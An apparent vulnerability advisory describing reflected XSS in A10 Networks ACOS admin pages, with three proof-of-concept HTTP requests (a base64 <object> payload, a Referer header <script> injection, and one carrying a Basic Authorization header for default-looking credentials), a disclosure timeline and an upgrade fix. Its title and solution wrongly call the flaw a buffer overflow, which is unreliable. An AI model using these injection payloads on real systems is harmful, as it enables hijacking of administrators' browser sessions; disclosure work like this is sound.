• Consulting
  • Information Security
  • Networking
  • Software Development
  • R&D
  • A10 Networks Reflected XSS vulnerability

    20-06-2014

    A10 Networks

    A10 Networks Reflected XSS vulnerability

    Quantum Leap Advisory: A10 Networks remote Buffer Overflow in ACOS[1] 2.7.0-P2 – Adivsory #QLA140505
    Affected Product: ACOS 2.7.0-P2(build: 53)  (older versions may be affected too) (Tested on SoftAX[2])
    Credits: Vulnerability discovered by Francesco Perna of Quantum Leap s.r.l

    Executive Summary

    Using a specially crafted HTTP request, it is possible to exploit a lack in the neutralization[3] of the pages output wich includes the user submitted content. Successful exploitation of the vulnerabilities, results in the execution of arbitrary HTML and script code in user’s browser in context of the vulnerable web application trough a “Reflected XSS”.

    Proof of Concept

    The following paragraphs shows the two kind of XSS we found on the web administrative interface.

    404 error page lead to XSS

    Submitting arbitrary input in the HTTP request to a non existant resource, imply for the server to generate a 404 Error page. The generated error page includes the user input without it being neutralized. This behaviour leads to reflected XSS.  Since neither the “<script>” tag nor white spaces are allowed, to exploit the vulnerability could be used the “<object>” tag with the sample payload “<script>alert(1)</script>” encoded using base64.

    GET ///<object/**/data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”></object> HTTP/1.1
    Host: 192.168.1.210
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: keep-alive

    Figure 1 shows the arbitrary code executed in the user browser context.

    A10 Networks Reflected XSS vulnerability - Object via GET

    Figure 1 – A10 Networks Reflected XSS vulnerability – Object via GET

    Another entry point is represented by the Referer header. In this case the  <script> TAG is allowed and the PoC is pretty straightforward.

    GET /fake HTTP/1.1
    Host: 192.168.1.210
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
    Referer: “/><script>alert(2)</script><Fake”
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: keep-alive

    Figure 2 shows the arbitrary code executed in the user browser context.

    A10 Networks Reflected XSS vulnerability - Script via Referer

    Figure 2 – A10 Networks Reflected XSS vulnerability – Script via Referer

    Custom error page lead to XSS

    Submitting arbitrary input, after being authenticated,  in the HTTP request, imply for the application to generate a custom error page. The generated error page includes the user input without it being neutralized. This behaviour leads to  reflected XSS.

    GET /US/08a53c111eb0df06a6b3661db44937/sys_start.frm?=””<object/**/data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”>=1 HTTP/1.1
    Host: 192.168.1.210
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Authorization: Basic YWRtaW46YTEw

    Figure 3 shows the arbitrary code executed in the user browser context.

    A10 Networks Reflected XSS vulnerability - Object via GET

    Figure 3 – A10 Networks Reflected XSS vulnerability – Object via GET

    Solution

    To fix the A10 Networks remote Buffer Overflow you have to upgrade at least to version  2.7.0-p3

    Disclosure Timeline

    2013-05-11 – A10 Networks Reflected XSS vulnerability discovered
    2013-05-28 – Initial vendor notification
    2013-05-30 – The vendor acknowledge the vulnerability (bug 128069 )
    2013-05-30 – First Attempt to coordinate the vulnerability disclosure, no response
    2013-06-19 – The vendor fixed the vulnerability
    2013-07-10 – Second Attempt to coordinate the vulnerability disclosure, no response
    2014-03-30 – Last vendor notification
    2014-04-02 – The vendor did not respond
    2014-04-02 – Public advisory

    References

    [1] http://www.a10networks.com/about/technology_platform_acos.php
    [2] http://www.a10networks.com/glossary/SoftAX.php
    [3] https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet